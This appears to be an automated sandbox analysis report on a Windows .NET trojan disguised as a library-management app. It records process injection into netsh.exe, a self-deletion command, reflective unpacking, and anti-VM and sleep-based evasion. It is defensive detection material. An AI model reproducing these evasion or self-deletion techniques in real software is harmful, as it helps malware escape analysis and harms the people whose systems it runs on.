Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process created: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process created: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process created: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process created: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe" Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\cK1g5gckZR9VHjj.exe.log Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winEXE@9/1@7/4
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6992:120:WilError_01
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
Source: cK1g5gckZR9VHjj.exe String found in binary or memory: /IVectorVi;component/views/addbook.xaml
Source: cK1g5gckZR9VHjj.exe String found in binary or memory: views/addbook.baml
Source: cK1g5gckZR9VHjj.exe String found in binary or memory: views/addcustomer.baml
Source: cK1g5gckZR9VHjj.exe String found in binary or memory: /IVectorVi;component/views/addcustomer.xaml
Source: cK1g5gckZR9VHjj.exe String found in binary or memory: /IVectorVi;component/views/addbook.xaml
Source: cK1g5gckZR9VHjj.exe String found in binary or memory: views/addcustomer.baml
Source: cK1g5gckZR9VHjj.exe String found in binary or memory: views/addbook.baml
Source: cK1g5gckZR9VHjj.exe String found in binary or memory: /IVectorVi;component/views/addcustomer.xaml
Source: cK1g5gckZR9VHjj.exe String found in binary or memory: /IVectorVi;component/views/addbook.xaml
Source: cK1g5gckZR9VHjj.exe String found in binary or memory: views/addbook.baml
Source: cK1g5gckZR9VHjj.exe String found in binary or memory: views/addcustomer.baml
Source: cK1g5gckZR9VHjj.exe String found in binary or memory: /IVectorVi;component/views/addcustomer.xaml
Source: cK1g5gckZR9VHjj.exe String found in binary or memory: O/IVectorVi;component/views/addbook.xamle/IVectorVi;component/views/borrowfrombookview.xaml[/IVectorVi;component/views/borrowingview.xamlU/IVectorVi;component/views/changebook.xaml]/IVectorVi;component/views/changecustomer.xamlY/IVectorVi;component/views/customerview.xaml]/IVectorVi;component/views/deletecustomer.xamlS/IVectorVi;component/views/errorview.xamlW/IVectorVi;component/views/smallextras.xamlW/IVectorVi;component/views/addcustomer.xaml
Source: cK1g5gckZR9VHjj.exe String found in binary or memory: *images/booksimage.jpg$views/addbook.baml1J,views/addcustomer.baml
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: cK1g5gckZR9VHjj.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: cK1g5gckZR9VHjj.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: netsh.pdb source: cK1g5gckZR9VHjj.exe, 00000002.00000002.434873438.0000000002FB0000.00000040.00020000.sdmp
Source: Binary string: netsh.pdbGCTL source: cK1g5gckZR9VHjj.exe, 00000002.00000002.434873438.0000000002FB0000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: cK1g5gckZR9VHjj.exe, 00000002.00000002.434367747.00000000010DF000.00000040.00000001.sdmp, cK1g5gckZR9VHjj.exe, 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, netsh.exe, 0000000C.00000002.612442715.00000000037A0000.00000040.00000001.sdmp, netsh.exe, 0000000C.00000002.612896446.00000000038BF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: cK1g5gckZR9VHjj.exe, cK1g5gckZR9VHjj.exe, 00000002.00000002.434367747.00000000010DF000.00000040.00000001.sdmp, cK1g5gckZR9VHjj.exe, 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, netsh.exe, netsh.exe, 0000000C.00000002.612442715.00000000037A0000.00000040.00000001.sdmp, netsh.exe, 0000000C.00000002.612896446.00000000038BF000.00000040.00000001.sdmp

Data Obfuscation:

barindex
.NET source code contains potential unpacker
Source: cK1g5gckZR9VHjj.exe, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.cK1g5gckZR9VHjj.exe.8e0000.0.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.cK1g5gckZR9VHjj.exe.8e0000.0.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.0.cK1g5gckZR9VHjj.exe.2f0000.2.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.0.cK1g5gckZR9VHjj.exe.2f0000.3.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.0.cK1g5gckZR9VHjj.exe.2f0000.1.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.2.cK1g5gckZR9VHjj.exe.2f0000.0.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.0.cK1g5gckZR9VHjj.exe.2f0000.0.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.cK1g5gckZR9VHjj.exe.560000.7.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.cK1g5gckZR9VHjj.exe.560000.1.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.cK1g5gckZR9VHjj.exe.560000.5.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.2.cK1g5gckZR9VHjj.exe.560000.1.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.cK1g5gckZR9VHjj.exe.560000.2.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.cK1g5gckZR9VHjj.exe.560000.9.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.cK1g5gckZR9VHjj.exe.560000.0.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 0_2_008E92F5 push ds; ret 0_2_008E9340
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 0_2_008E9347 push ds; ret 0_2_008E934C
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 0_2_008E9361 push ds; retf 0_2_008E9364
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 0_2_053856E0 push esp; iretd 0_2_053856E9
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 1_2_002F9361 push ds; retf 1_2_002F9364
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 1_2_002F9347 push ds; ret 1_2_002F934C
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 1_2_002F92F5 push ds; ret 1_2_002F9340
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0041B822 push eax; ret 2_2_0041B828
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0041B82B push eax; ret 2_2_0041B892
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0041B88C push eax; ret 2_2_0041B892
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_004153E6 push ss; iretd 2_2_004153EC
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0041541E push ss; iretd 2_2_004153EC
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0041B7D5 push eax; ret 2_2_0041B828
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_005692F5 push ds; ret 2_2_00569340
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00569347 push ds; ret 2_2_0056934C
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00569361 push ds; retf 2_2_00569364
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0103D0D1 push ecx; ret 2_2_0103D0E4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_0381D0D1 push ecx; ret 12_2_0381D0E4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_02DD53E6 push ss; iretd 12_2_02DD53EC
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_02DDB88C push eax; ret 12_2_02DDB892
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_02DDB82B push eax; ret 12_2_02DDB892
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_02DDB822 push eax; ret 12_2_02DDB828
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_02DDB7D5 push eax; ret 12_2_02DDB828
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_02DD541E push ss; iretd 12_2_02DD53EC
Source: initial sample Static PE information: section name: .text entropy: 7.85526570093

Hooking and other Techniques for Hiding and Protection:

barindex
Self deletion via cmd delete
Source: C:\Windows\SysWOW64\netsh.exe Process created: /c del "C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe"
Source: C:\Windows\SysWOW64\netsh.exe Process created: /c del "C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe" Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3
Source: Yara match File source: 0.2.cK1g5gckZR9VHjj.exe.2c38e9c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.cK1g5gckZR9VHjj.exe.2ccaf94.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.357245488.0000000002BD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.357490796.0000000002C9A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: cK1g5gckZR9VHjj.exe PID: 7160, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.357245488.0000000002BD1000.00000004.00000001.sdmp, cK1g5gckZR9VHjj.exe, 00000000.00000002.357490796.0000000002C9A000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.357245488.0000000002BD1000.00000004.00000001.sdmp, cK1g5gckZR9VHjj.exe, 00000000.00000002.357490796.0000000002C9A000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe RDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe RDTSC instruction interceptor: First address: 0000000002DC8604 second address: 0000000002DC860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe RDTSC instruction interceptor: First address: 0000000002DC899E second address: 0000000002DC89A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264 Thread sleep time: -9223372036854770s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 3556 Thread sleep count: 1934 > 30 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264 Thread sleep time: -239875s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 3556 Thread sleep count: 1406 > 30 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 7164 Thread sleep time: -36459s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264 Thread sleep time: -239747s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264 Thread sleep time: -239639s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264 Thread sleep time: -239530s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264 Thread sleep time: -239422s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264 Thread sleep time: -239296s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264 Thread sleep time: -239187s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264 Thread sleep time: -239047s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264 Thread sleep time: -238919s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264 Thread sleep time: -238796s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264 Thread sleep time: -238672s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264 Thread sleep time: -238562s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264 Thread sleep time: -238452s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264 Thread sleep time: -238157s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264 Thread sleep time: -237500s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264 Thread sleep time: -237359s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264 Thread sleep time: -237246s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264 Thread sleep time: -237139s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264 Thread sleep time: -237031s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264 Thread sleep time: -236844s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264 Thread sleep time: -236344s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264 Thread sleep time: -236109s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264 Thread sleep time: -235797s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264 Thread sleep time: -235468s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264 Thread sleep time: -235355s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 3200 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe TID: 4624 Thread sleep time: -34000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\netsh.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_004088D0 rdtsc 2_2_004088D0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 240000 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 239875 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 239747 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 239639 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 239530 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 239422 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 239296 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 239187 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 239047 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 238919 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 238796 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 238672 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 238562 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 238452 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 238157 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 237500 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 237359 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 237246 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 237139 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 237031 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 236844 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 236344 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 236109 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 235797 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 235468 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 235355 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Window / User API: threadDelayed 1934 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Window / User API: threadDelayed 1406 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 922337203685477 Jump to behavior
